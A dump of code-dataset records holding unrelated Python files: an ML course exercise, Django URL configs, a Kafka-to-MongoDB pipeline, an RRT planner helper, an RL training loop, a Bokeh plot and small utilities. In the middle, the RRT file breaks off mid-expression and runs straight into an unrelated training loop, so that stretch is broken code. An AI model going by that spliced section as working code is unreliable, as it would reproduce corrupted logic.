int(stu.MARKS)\r\nprint(sum/no)\r\n","sub_path":"challenges/collections/collections.namedtuple.py","file_name":"collections.namedtuple.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"87945098","text":"\"\"\"\nB(E)3M33UI - Artificial Intelligence course, FEE CTU in Prague\nDecision trees and ensemble models\n\nPetr Posik, Jiri Spilka, CVUT, Praha 2018\n\"\"\"\n\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom matplotlib import pyplot as plt\n\nfrom mpg import load_mpg_for_2D_classification\nfrom plotting import compute_validation_curve, plot_validation_curve, plot_2D_class_model, \\\n plot_xy_classified_data\n\ndef compute_validation_curve(model, param_name, param_range, Xtr, ytr, Xtst, ytst):\n train_errors = np.zeros(len(param_range))\n test_errors = np.zeros(len(param_range))\n\n for i,val in np.ndenumerate(param_range):\n test_this = {param_name:val}\n model.set_params(**test_this)\n model.fit(Xtr,ytr)\n\n yhat = model.predict(Xtr)\n train_errors[i] = 1 - metrics.accuracy_score(y_true=ytr,y_pred=yhat)\n\n yhat = model.predict(Xtst)\n test_errors[i] = 1 - metrics.accuracy_score(y_true=ytst, y_pred=yhat)\n\n return train_errors,test_errors\n\ndef main():\n\n # Load data\n X, y = load_mpg_for_2D_classification()\n # X, y = load_mpg_for_classification()\n\n print('\\nThe dataset (X and y) size:')\n print('X: ', X.shape)\n print('y: ', y.shape)\n print('sum(y = 0): ', sum(y == 0))\n print('sum(y = 1): ', sum(y == 1))\n\n # random_state=2017 - lets keep the training and test set the same\n Xtr, Xtst, ytr, ytst = train_test_split(X, y, test_size=0.2, random_state=2017)\n\n # FIXME Task 1: Decision Tree\n # raise NotImplementedError\n # \n m1 = DecisionTreeClassifier()\n param_name = 'max_depth'\n param_range = np.arange(1,100)\n parameters = {param_name: param_range}\n clf = GridSearchCV(m1,parameters)\n clf.fit(Xtr,ytr)\n\n print(\"Decision tree\")\n print(\"Best parameters: \", clf.best_params_)\n print(\"CV score: \", clf.best_score_)\n\n train_errors, test_errors = compute_validation_curve(m1, param_name, param_range, Xtr, ytr, Xtst, ytst)\n #plot_validation_curve(param_range, train_errors, test_errors)\n\n m1.set_params(**clf.best_params_)\n m1.fit(Xtr,ytr)\n # < USE TRAINING DATA ONLY >\n\n # FIXME Task 2: Adaboost\n # raise NotImplementedError\n # \n\n m2 = AdaBoostClassifier(base_estimator=DecisionTreeClassifier(max_depth=1))\n param_name = 'n_estimators'\n param_range = np.arange(1,10)\n parameters = {param_name: param_range}\n clf = GridSearchCV(m2, parameters)\n clf.fit(Xtr, ytr)\n\n print(\"\\nAdaBoost\")\n print(\"Best parameters: \", clf.best_params_)\n print(\"CV score: \", clf.best_score_)\n\n train_errors, test_errors = compute_validation_curve(m2, param_name, param_range, Xtr, ytr, Xtst, ytst)\n #plot_validation_curve(param_range, train_errors, test_errors)\n\n m2.set_params(**clf.best_params_)\n m2.fit(Xtr, ytr)\n\n # FIXME Task 3: Random Forest\n # raise NotImplementedError\n # \n\n m3 = RandomForestClassifier()\n param_name = ['n_estimators','max_depth']\n param_range = [np.arange(1, 10),np.arange(1, 10)]\n parameters = dict(zip(param_name,param_range))\n clf = GridSearchCV(m3, parameters)\n clf.fit(Xtr, ytr)\n\n print(\"\\nRandom forest\")\n print(\"Best parameters: \", clf.best_params_)\n print(\"CV score: \", clf.best_score_)\n\n for key in parameters.keys():\n train_errors, test_errors = compute_validation_curve(m3, key, parameters[key], Xtr, ytr, Xtst, ytst)\n #plot_validation_curve(parameters[key], train_errors, test_errors)\n\n m3.set_params(**clf.best_params_)\n m3.fit(Xtr, ytr)\n\n # FIXME Task 4-5: Classification performance on test set, decision boundary\n # raise NotImplementedError\n # \n # < USE TEST DATA FOR PREDICTIONS>\n plt.figure()\n plot_xy_classified_data(Xtst[:, 0], Xtst[:, 1], ytst, xlbl='x', ylbl='y')\n plot_2D_class_model(m1)\n plt.title(\"Decision tree\")\n\n plt.figure()\n plot_xy_classified_data(Xtst[:, 0], Xtst[:, 1], ytst, xlbl='x', ylbl='y')\n plot_2D_class_model(m2)\n plt.title(\"AdaBoost\")\n\n plt.figure()\n plot_xy_classified_data(Xtst[:, 0], Xtst[:, 1], ytst, xlbl='x', ylbl='y')\n plot_2D_class_model(m3)\n plt.title(\"Random Forest\")\n # prediction accuracy on test set\n print('Accuracy on test data:')\n print('Decision Tree: ', metrics.accuracy_score(ytst, m1.predict(Xtst)))\n print('Adaboost: ', metrics.accuracy_score(ytst, m2.predict(Xtst)))\n print('Random forest: ', metrics.accuracy_score(ytst, m3.predict(Xtst)))\n raise NotImplementedError\n# catch all exceptions\ntry:\n plt.ion() # turn interactive mode on so our plots stay open like in matlab\n main()\n\nexcept BaseException as e:\n import traceback\n traceback.print_exc() # mimic printing traceback from an exception\n plt.ioff() # turn interactive mode off\n plt.show() # show whatever we have to show, it will stay open because we turned interactive mode off\n\n","sub_path":"Week6/ML05-1.py","file_name":"ML05-1.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"502286779","text":"from django.conf.urls import patterns, include, url\r\n#from django.contrib.staticfiles.url import staticfiles_urlpatterns\r\nfrom django.conf import settings\r\nfrom django.contrib import admin\r\n\r\nadmin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n # Examples:\r\n url(r'^$', 'Inicio.views.index', name='Financeiro_index'),\r\n url(r'^config/', 'Inicio.views.config', name='Financeiro_config'),\r\n url(r'^conta/', 'Inicio.views.conta', name='Financeiro_conta'),\r\n url(r'^ajuda/', 'Inicio.views.ajuda', name='Financeiro_ajuda'),\r\n url(r'^admin/', include(admin.site.urls)),\r\n)\r\n","sub_path":"Financeiro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"226962916","text":"import os\nimport sys\n\n\nimport ujson\nimport asyncio\nfrom kafka import KafkaConsumer\nfrom motor.motor_asyncio import AsyncIOMotorClient\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(basedir.replace(os.sep + 'pipline', ''))\nsys.path.append(basedir)\n\n\nfrom util.load_config import load_config\n\n\ndef add_to_mongo(config_name):\n config = load_config(basedir.replace(os.sep + 'pipline', '') + os.sep +\n os.sep.join(['configs', config_name]))\n MONGODB_SERVER = config['MONGO']['MONGODB_SERVER']\n MONGODB_PORT = int(config['MONGO']['MONGODB_PORT'])\n MONGODB_DB = config['MONGO']['MONGODB_DB']\n MONGODB_COLLECTION = config['MONGO']['MONGODB_COLLECTION']\n MONGODB_USER = config['MONGO']['MONGODB_USER']\n MONGODB_PASSWORD = config['MONGO']['MONGODB_PASSWORD']\n KAFKA_BOOTSTRAP_SERVERS = config['KAFKA']['KAFKA_BOOTSTRAP_SERVERS']\n KAFKA_DISCOVER_DETAIL_TOPIC = config['KAFKA']['KAFKA_TOPIC']\n KAFKA_GROUP = config['KAFKA']['KAFKA_GROUP']\n consumer = KafkaConsumer(KAFKA_DISCOVER_DETAIL_TOPIC, bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,\n auto_offset_reset='earliest', group_id=KAFKA_GROUP)\n client = AsyncIOMotorClient('mongodb://' + MONGODB_USER + ':' + MONGODB_PASSWORD + '@' + MONGODB_SERVER + ':'\n + str(MONGODB_PORT))\n db = client[MONGODB_DB]\n collection = db[MONGODB_COLLECTION]\n results = consumer\n for result in results:\n msg = result.value.decode()\n item = ujson.loads(msg)\n key = list(item.keys())[0]\n value = item[key]\n target = {\n 'keyword': str(key).strip(),\n 'info_resp': value\n }\n async def do_update():\n result = await collection.update_many(\n {'keyword': str(key).strip()},\n {'$set': target}, upsert=True)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(do_update())\n\n\n\n","sub_path":"encircling-net/pipline/Discover_Detail_Pipline.py","file_name":"Discover_Detail_Pipline.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363162429","text":"#! /usr/bin/env python\n\nimport random , numpy as np\nimport math\nimport cmath\nfrom shapely.geometry import Polygon, Point, LineString\nfrom descartes import PolygonPatch\nimport matplotlib.pyplot as plt\n\nPI = np.pi\nTHRESHOLD = 0.25 # 1/2 of bot length\nALPHA = 10 # Experimental in scan_obstacle_checker for optimization\nMIN_ANG = 0 # Starting angle at which the lidar starts\nMAX_ANG = 2*PI # Max angle of Lidar\nSHOW_ANIMATION = False\nEXPAND_DIS = 0.5\n\ndef make_obstacles_scan(scan_list):\n\t\"\"\"Make Line obstacles from Laserscan\n Args:\n scan_list: List of LaserScan ranges\n Return:\n (line_obstacles , pts) : (Making lines of scan obstacles , scan_list(r,theta) --> scan_list(x,y) )\n \"\"\"\n\n\tpt_ang = np.arange( MIN_ANG , MAX_ANG , (MAX_ANG - MIN_ANG)/len(scan_list) )\n\tpt_scan = np.array(scan_list)\n\tpts = []\n\tpt_x = np.multiply(pt_scan , np.cos(pt_ang))\n\tpt_y = np.multiply(pt_scan , np.sin(pt_ang))\n\n\tfor a,b in zip(pt_x,pt_y):\n\t\tpts.append((a,b))\n\n\tpt_scan_prev = np.append(pt_scan[1:],pt_scan[0])\n\t\n\tline_obst = abs(pt_scan_prev - pt_scan)>2*THRESHOLD\n\tind=(np.argwhere(line_obst==True)).reshape(-1)\n\t\n\tline_obstacles = []\n\t\n\tfor i in range(len(ind)-1):\n\t\tline = [ (pt[0] , pt[1]) for pt in pts[ind[i]+1 : ind[i+1]+1] ]\n\t\tline_obstacles.append(line)\n\n\tif SHOW_ANIMATION:\n\t\tplt.clf()\n\t\tfor i in range(len(line_obstacles)):\n\t\t\tplt.plot([x for (x, _) in line_obstacles[i]], [y for (_, y) in line_obstacles[i]],'k')\n\t\tplt.grid(True)\n\t\tplt.axis([-7,7,-7,7])\n\t\tplt.show()\n\t\n\treturn (line_obstacles , pts)\n\n\ndef adjustable_random_sampler(sample_area, goal, goal_sample_rate):\n \"\"\"Randomly sample point in area while sampling goal point \n at a specified rate.\n\n Args:\n sample_area: area to sample point in (min and max)\n goal: tuple containing goal point coordinates.\n goal_sample_rate: number between 0 and 1 specifying how often \n to sample the goal point.\n \n Return:\n Randomly selected point as a tuple.\n \"\"\"\n\n if random.random() > goal_sample_rate:\n return (random.uniform(sample_area[0], sample_area[1]), \n random.uniform(sample_area[0], sample_area[1]))\n else:\n return goal\n\n\ndef scan_obstacle_checker(scan_list , point):\n\t\"\"\"\n\tChecking Whether the sampled point lies beyond THRESHOLD distance of every point. Experimental\n\n\t\tArgs:\n\t\t\tscan_list --> List of scan \n\t\t\tpoint --> sampled point\n\n\t\tReturns --> ('nan','nan') if lies in obstacle else point\n\t\"\"\"\n\t#Point in polar coordinates (rho , phi)\n\tphi = math.atan2(point[1] , point[0])\n\t\n\trho = math.sqrt(point[0]**2 + point[1]**2)\n\n\t#enumerating the list \n\tscan_list_enum = np.arange( MIN_ANG , MAX_ANG , (MAX_ANG - MIN_ANG)/len(scan_list) )\n\n\tfor obstacle in zip(scan_list_enum , scan_list):\n\t\t# Checking the absolute of vector difference from each coordinate to be greater than THRESHOLD\n\t\tif abs( complex( cmath.rect(obstacle[1] , obstacle[0]) ) - complex( cmath.rect(rho , phi) ) ) < THRESHOLD:\n\t\t\treturn float('nan'),float('nan')\n\treturn point\n\n#############################################################\n##################EXPERIMENTAL###############################\n\t# Phi in degrees, used for indexing in LaserScan\n\t# phi_deg = int(math.floor(phi*180/PI))\n\n\t# try:\n\t# \tALPHA = int(math.ceil(math.asin(THRESHOLD/rho)))\n\t# except:\n\t# \tALPHA=10\n\t# \tprint(rho)\n\t# \t# return float('nan'),float('nan')\n\t# if (ALPHA<=phi_deg<=360 - ALPHA):\n\t# \tfor obstacle in scan_list_enum[phi_deg-ALPHA:phi_deg+ALPHA+1]:\n\t# \t\t# print(abs(complex(cmath.rect(obstacle[1],obstacle[0]) - complex(cmath.rect(rho,phi)))))\n\t# \t\tif abs(complex(cmath.rect(obstacle[1],obstacle[0]*PI/180) - complex(cmath.rect(rho,phi)))) 0:\n\t\t\t\tfor layer in env.model.layers:\n\t\t\t\t\tnum_layer += 1\n\t\t\t\t\tif num_layer > 10:\n\t\t\t\t\t\tlayer.trainable = True\n\t\t\tfor epoch in range(num_epoch_2):\n\t\t\t\tfor num_minibatch in range(x_train.shape[0]/batchsize):\n\t\t\t\t\t#print('shape',x_train)\n\t\t\t\t\tx_train_batch = x_train[num_minibatch*batchsize:min((num_minibatch+1)*batchsize,x_train.shape[0]),:]\n\n\t\t\t\t\t#w,p = env.predict(x_train_batch)\n\n\t\t\t\t\tloss_bf = 0\n\t\t\t\t\twhile True:\n\t\t\t\t\t\tcur_x = state\n\t\t\t\t\t\tx = cur_x if np.sum(cur_x) != 0 else np.zeros((1,dim_feature*dim_feature))#np.random.normal(0,0.1,(1,dim_feature*dim_feature))\n\t\t\t\t\t\tx = np.reshape(x, (1, dim_feature*dim_feature))\n\t\t\t\t\t\tprev_x = copy.deepcopy(cur_x)\n\n\t\t\t\t\t\tact_times += 1\n\n\t\t\t\t\t\t#if len(xx) != 0:\n\t\t\t\t \t\t#loss_bf = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\tloss_bf = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\t\n\n\t\t\t\t\t\t#print('x',x)\n\t\t\t\t\t\taction1, action2, action3, prob = rl.act(x, act_times, cur_x)\n\t\t\t\t\t\t#print('state',state)\n\t\t\t\t\t\t#print('a1',action1)\n\t\t\t\t\t\tflag = 0\n\t\t\t\t\t\tfflag = 0\n\t\t\t\t\t\tif action1>-1:\n\t\t\t\t\t\t\ti = 0\n\t\t\t\t\t\t\tif state[int(action1/dim_feature), action1%dim_feature] == 1 or state[action1%dim_feature, int(action1/dim_feature)] == 1 or int(action1/dim_feature) == action1%dim_feature:\n\t\t\t\t\t\t\t\tflag = 1\n\t\t\t\t\t\t\tif flag == 0 or (len(xx) == 0 and int(action1/dim_feature) != action1%dim_feature):\n\t\t\t\t\t\t\t\txx.append(int(action1/dim_feature))\n\t\t\t\t\t\t\t\tyy.append(action1%dim_feature)\n\t\t\t\t\t\t#print('connect',xx)\n\t\t\t\t\t\t#print('connect',yy)\n\t\t\t\t\t\n\t\t\t\t\t\tloss_af1 = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\treward1 = rate*(loss_bf-loss_af1)\n\t\t\t\t\t\t#reward1 = rate*(loss_bf-loss_af1)\n\n\t\t\t\t\t\tnum_delete = 0\n\n\t\t\t\t\t\t#print('a2',action2)\n\t\t\t\t\t\tif action2>-1:\n\t\t\t\t\t\t\tif state[int(action2/dim_feature), action2%dim_feature] == 1:\n\n\t\t\t\t\t\t\t\tfflag = 1\n\t\t\t\t\t\t\t\tfor i in range(len(xx)):\n\t\t\t\t\t\t\t\t\tif xx[i]==int(action2/dim_feature) and yy[i]==action2%dim_feature:\n\t\t\t\t\t\t\t\t\t\tdel xx[i]\n\t\t\t\t\t\t\t\t\t\tdel yy[i]\n\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t#print('delete',xx)\n\t\t\t\t\t\t#print('delete',yy)\n\t\t\t\t\t\t#print('len', len(xx), len(yy))\n\n\n\t\t\t\t\t\tloss_af2 = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\t#reward2 = rate*(loss_bf-loss_af2)\n\t\t\t\t\t\treward2 = rate*(loss_af1-loss_af2)\n\n\t\t\t\t\t\tprint('loss',loss_bf,loss_af1,loss_af2)\n\n\n\t\t\t\t\t\tmin_ambiguity = 0\n\t\t\t\t\t\tmin_index = -1\n\t\t\t\t\t\t#print('ll',probb.shape)\n\t\t\t\t\t\t#print('lenx',len(xx))\n\t\t\t\t\t\t#print('leny',len(yy))\n\t\t\t\t\t\tif len(xx)>max_connection and flag == 0:\n\t\t\t\t\t\t\tfor i in range(len(xx)-1):\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tmin_ambiguity = max(min_ambiguity, abs(np.mean(np.mean(prob,axis = 0),axis = 0)[yy[i]]-0.5))\n\t\t\t\t\t\t\t\tif min_ambiguity==abs(np.mean(np.mean(prob,axis = 0), axis = 0)[yy[i]]-0.5):\n\t\t\t\t\t\t\t\t\tmin_index = i\n\t\t\t\t\t\t\taction2 = xx[min_index]*dim_feature+yy[min_index]\n\t\t\t\t\t\t\tdel xx[min_index]\n\t\t\t\t\t\t\tdel yy[min_index]\n\n\t\t\t\t\t\tloss_af2 = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\treward2 = rate*(loss_bf-loss_af2)\n\n\t\t\t\t\t\tstate = np.zeros((dim_feature, dim_feature))\n\t\t\t\t\t\tif len(xx)>0:\n\t\t\t\t\t\t\tfor i in range(len(xx)):\n\t\t\t\t\t\t\t\tstate[xx[i],yy[i]] = 1\n\t\t\n\t\t\t\t\t\t'''\n\t\t\t\t\t\tif action1 > -1:\n\t\t\t\t\t\t\tstate[int(action1/dim_feature),action1%dim_feature] = 1\n\t\t\t\t\t\tif action2 > -1:\n\t\t\t\t\t\t\tstate[int(action2/dim_feature),action2%dim_feature] = 0\n\t\t\t\t\t\t'''\n\t\t\t\t\t\tif action3 == 1:\n\t\t\t\t\t\t\tdone = 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdone = 0\n\t\t\t\t\t\t#print('reward1',reward1.shape)\n\t\t\t\t\t\t#print('reward2',reward2.shape)\n\t\t\t\t\t\tscore += reward1+reward2\n\t\t\t\t\t\trl.remember(x, action1, action2, prob, reward1, reward2)\n\t\t\t\t\t\tif done:\n\t\t\t\t\t\t\tepisode += 1\n\t\t\t\t\t\t\trl.train()\n\t\t\t\t\t\t\t#rl.connect_thr = min(0.8, rl.connect_thr+(len(xx)-5)*0.000001/num_epoch_1)\n\t\t\t\t\t\t\trl.remove_thr = 1.0/(dim_feature*dim_feature)\n\t\t\t\t\t\t\tact_times = 0\n\t\t\t\t\t\t\tprint('Episode: %d - Score: %f.' % (episode, score))\n\t\t\t\t\t\t\tscore = 0\n\t\t\t\t\t\t\tprev_x = None\n\t\t\t\t\t\t\t#if episode > 1 and episode % 10 == 0:\n\t\t\t\t\t\t\t\t#rl.save('pong.h5')\n\t\t\t\t\t\t\tbreak\n\t\t\t\tloss_bf = np.sum(env.return_loss(x_train,[],[]))\n\t\t\t\tloss_af = np.sum(env.return_loss(x_train,xx,yy))\n\t\t\t\tprint('final_reward', loss_bf-loss_af)\n\t\t\t\tfinalrewards.append(loss_bf-loss_af)\n\n\t\tprint('finalrewards',finalrewards)\n\t\tenv.save('USNet_Weight_raw_64.h5')\n\t\tprint('xx',xx,yy,alpha,beta)\n\t\t\n\n\t\twith open('xx.bin','wb') as xx_bin:\n\t\t\tpickle.dump(xx,xx_bin)\n\t\twith open('yy.bin','wb') as yy_bin:\n\t\t\tpickle.dump(yy,yy_bin)\n\n\t\tenv.model.compile(loss=env.TOLoss(xx,yy),optimizer=opt)\n\t\t\n\t\tenv.model.fit(x_train, x_train, batch_size=batchsize, epochs=num_epoch_1 )\n\t\t\n\t\tenv.save('USNet_Weight_64.h5')\n\n\t\tx_test = np.transpose(np.load('feat16_test.npy'))\n\n\t\t#x_test = (x_test+1)/2\n\n\n\t\tnum_post = [1]*dim_feature\n\t\tprob = np.zeros((x_train.shape[0], dim_feature))\n\t\tw = env.model.predict(x_train)\n\t\tfor j in range(dim_feature):\n\t\t\tprob[:,j] = w[:,j*dim_feature+j]\n\t\t\tfor i in range(len(xx)):\n\t\t\t\tif j == yy[i]:\n\t\t\t\t\tprob[:,yy[i]] += w[:,xx[i]*dim_feature+yy[i]]\n\t\t\t\t\tnum_post[yy[i]] += 1\n\t\t\tprob[:,j] /= num_post[j]\n\t\t\t\n\t\t\n\t\tprob_train = prob\n\n\n\t\tnum_post = [1]*dim_feature\n\t\tprob = np.zeros((x_test.shape[0],dim_feature))\n\t\tw = env.model.predict(x_test)\n\n\t\tfor j in range(dim_feature):\n\t\t\tprob[:,j] = w[:,j*dim_feature+j]\n\t\t\tfor i in range(len(xx)):\n\t\t\t\tif j == yy[i]:\n\t\t\t\t\tprob[:,yy[i]] += w[:,xx[i]*dim_feature+yy[i]]\n\t\t\t\t\tnum_post[yy[i]] += 1\n\t\t\tprob[:,j] /= num_post[j]\n\t\t\t\n\t\t\n\t\tprob_test = prob\n \n\t\ttrainName = 'J2J3_feat_train%d.mat' % turning\n\t\ttestName = 'J2J3_feat_test%d.mat' % turning\n\t\t\t \n\t\tsio.savemat(trainName, {'prob_train':prob_train})\n\t\tsio.savemat(testName, {'prob_test':prob_test})\n\t\tprint('test',prob_test)\n\t\tprint('alpha')\n","sub_path":"main_twostage_4096.py","file_name":"main_twostage_4096.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"32413550","text":"from PIL import Image\nimport numpy\nimport csv\nimport os\n\t\npicArray = numpy.zeros([41995,2], dtype = object)\ndef convertImg(img,numb,result):\n\tWIDTH, HEIGHT = img.size\n\tvalue = [] \n\n\tdata = list(img.getdata()) # convert image data to a list of integers\n\tdata = [data[offset:offset+WIDTH] for offset in range(0, WIDTH*HEIGHT, WIDTH)]\n\n\n\tfor x in range(0,27):\n\t\tfor y in range(0,27): \n\t\t\tvalue.append(data[x][y])\n\tpicArray[numb][0] = value\n\tpicArray[numb][1] = result\n\n\t\n\n\n\nfor l in range(0,41995):\n\tif os.path.exists('img_'+str(l)+'.jpg'):\n\t\timag = Image.open('img_'+str(l)+'.jpg').convert('L')\n\t\tconvertImg(imag,l,0)\nnumpy.savetxt(\"array.csv\",picArray,fmt = \"%s\")\nf = open(\"array.csv\", 'r')\nfor row in f:\n\tprint(row)\n\n","sub_path":"trainingSet/0/import cPickle.py","file_name":"import cPickle.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141257111","text":"from bokeh.plotting import figure\nfrom bokeh.io import output_file, show\nfrom bokeh.layouts import row, column, gridplot\nfrom bokeh.palettes import Dark2_5 as palette\nimport pickle\n\noutput_file('panning.html')\n\nwith open(r'C:\\Users\\Katja\\PythonCodingTraining\\DataVisualization\\data-viz\\bokeh\\iris.pickle', 'rb') as file:\n iris = pickle.load(file)\n\nsepal_length = iris['data'][:,0]\nsepal_width = iris['data'][:,1]\npetal_length = iris['data'][:,2]\npetal_width = iris['data'][:,3]\nclasses = iris['target']\n\n# separate data via class\nsetosa_sepal_length = sepal_length[classes == 0]\nsetosa_sepal_width = sepal_width[classes == 0]\nsetosa_petal_length = petal_length[classes == 0]\nsetosa_petal_width = petal_width[classes == 0]\nversicolor_sepal_length = sepal_length[classes == 1]\nversicolor_sepal_width = sepal_width[classes == 1]\nversicolor_petal_length = petal_length[classes == 1]\nversicolor_petal_width = petal_width[classes == 1]\nvirginica_sepal_length = sepal_length[classes == 2]\nvirginica_sepal_width = sepal_width[classes == 2]\nvirginica_petal_length = petal_length[classes == 2]\nvirginica_petal_width = petal_width[classes == 2]\n\n# Creating multiple plots by creating multiple figures and then telling the show function \n# how to arrange these figures\n\nfig1 = figure(x_axis_label = 'Sepal length (cm)', y_axis_label = 'Sepal width (cm)')\nfig1.circle(setosa_sepal_length, setosa_sepal_width, color = palette[0], legend_label= 'setosa')\nfig1.circle(versicolor_sepal_length, versicolor_sepal_width, color = palette[1], legend_label= 'versicolor')\nfig1.circle(virginica_sepal_length, virginica_sepal_width, color = palette[2], legend_label= 'virginica')\n\nfig3 = figure(x_axis_label = 'Sepal length (cm)', y_axis_label = 'Petal length (cm)', x_range = fig1.x_range)\nfig3.circle(setosa_sepal_length, setosa_petal_length, color = palette[0], legend_label= 'setosa')\nfig3.circle(versicolor_sepal_length, versicolor_petal_length, color = palette[1], legend_label= 'versicolor')\nfig3.circle(virginica_sepal_length, virginica_petal_length, color = palette[2], legend_label= 'virginica')\n\n\nshow(column(fig1, fig3))","sub_path":"bokeh_panning.py","file_name":"bokeh_panning.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"371984695","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# -*- mode: python -*-\nimport os\nimport sys\n\nfrom setuptools import setup, find_packages\n\n\n'''\n\nVERSION HISTORY\n\n0.0.1 - Primeira instalação\n0.0.2 - Registrando cobrança\n\n'''\n\n__version__ = '0.0.2'\n\n\nhere =os.path.abspath(os.path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(os.path.join(here, 'README.rst')) as f:\n long_description = f.read()\n\nsetup(\n name = 'pyf2b',\n version = __version__,\n packages = find_packages(),\n script_name = 'setup.py',\n scripts = [],\n\n package_data = {\n \"base\": [\"VERSION\"],\n },\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3', \n ],\n # metadata for upload to PyPI\n author = 'William Marquardt',\n author_email = 'williammqt@gmail.com',\n description = 'Python lib that consume F2b API.',\n long_description = long_description,\n license = 'MIT',\n keywords = 'python f2b cobranca',\n url = 'https://github.com/wmarquardt/pyf2b',\n install_requires=[\n 'requests',\n ],\n)\n","sub_path":"pypi_install_script/pyf2b-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"265349504","text":"#\n# @lc app=leetcode.cn id=279 lang=python3\n#\n# [279] 完全平方数\n#\nfrom typing import *\n# @lc code=start\nclass node:\n def __init__(self,value,step=0):\n self.value = value\n self.step = step\n def __str__(self):\n return ''.format(self.value,self.step)\n\n\nclass Solution:\n def numSquares(self, n: int) -> int:\n queue = [node(n)]\n visited = set([node(n).value])\n \n while queue:\n vertex = queue.pop(0)\n residuals = [vertex.value - n*n for n in range(1,int(vertex.value**.5)+1)]\n for i in residuals:\n new_vertex = node(i, vertex.step+1)\n if i==0: \n return new_vertex.step\n \n elif i not in visited:\n queue.append(new_vertex)\n visited.add(i)\n \n return -1\n# @lc code=start","sub_path":".leetcode/279.完全平方数.py","file_name":"279.完全平方数.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"710900","text":"import json\n\nclass manager:\n \"\"\"\n read and write a json file\n \"\"\"\n def __init__(self, path, default_datas):\n self.datas = None\n self.path = path\n self.default_datas = default_datas\n\n self.read_file()\n\n def read_file(self):\n \"\"\"\n Read the file and save the converted data to self.datas\n Also check and andle read errors\n \"\"\"\n try:\n print(\"laoding\", self.path)\n file_read = open(self.path, \"r\")\n self.datas = json.load(file_read)\n file_read.close()\n\n # check and reset if keys are mising ; WILL NORMALY NEVER APPEND\n for key in self.default_datas.keys():\n if key not in self.datas:\n print(\"XXX key \\\"\" + key + \"\\\" not found. key will be created\")\n self.datas[key] = self.default_datas[key]\n self.write_datas(reason=\"key missing\")\n\n print(self.path, \"file loaded\")\n print(\"datas : \")\n print(self.datas)\n\n # if we were not able to find the file\n except FileNotFoundError:\n print(\"XXX\", self.path, \"not found. File will be created\")\n # we create the file with it's default datas\n self.datas = self.default_datas\n self.write_datas(reason=\"file not found\")\n\n # if there is an error while trying to read the file\n except json.decoder.JSONDecodeError:\n print(\"XXX\", self.path, \"error while trying to read file. File will be reset to default\")\n self.datas = self.default_datas\n self.write_datas(reason=\"reseting file\")\n\n def write_datas(self, reason=\"None\"):\n \"\"\"\n write the value of self.datas to the json file\n \"\"\"\n file_write = open(self.path, \"w\")\n json.dump(self.datas, file_write, indent=4)\n file_write.close()\n print(self.path, \"file created or updated, reason : \" + reason)\n print(\"datas : \")\n print(self.datas)","sub_path":"python_source_code/json_data_file_manager.py","file_name":"json_data_file_manager.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"48190586","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.usuario_list),\n url(r'^usuario/(?P[0-9]+)/$', views.usuario_detail),\n url(r'^usuario/new/$', views.usuario_new, name='usuario_new'),\n url(r'^medico/(?P[0-9]+)/$', views.medico_detail),\n url(r'^medico/edit/(?P[0-9]+)/$', views.medico_edit),\n url(r'^medico/new/$', views.medico_new, name='medico_new'),\n url(r'^medicamento/(?P[0-9]+)/$', views.medicamento_detail),\n url(r'^medicamento/edit/(?P[0-9]+)/$', views.medicamento_edit),\n url(r'^medicamento/delete/(?P[0-9]+)/$', views.medicamento_delete),\n url(r'^medicamento/new/$', views.medicamento_new, 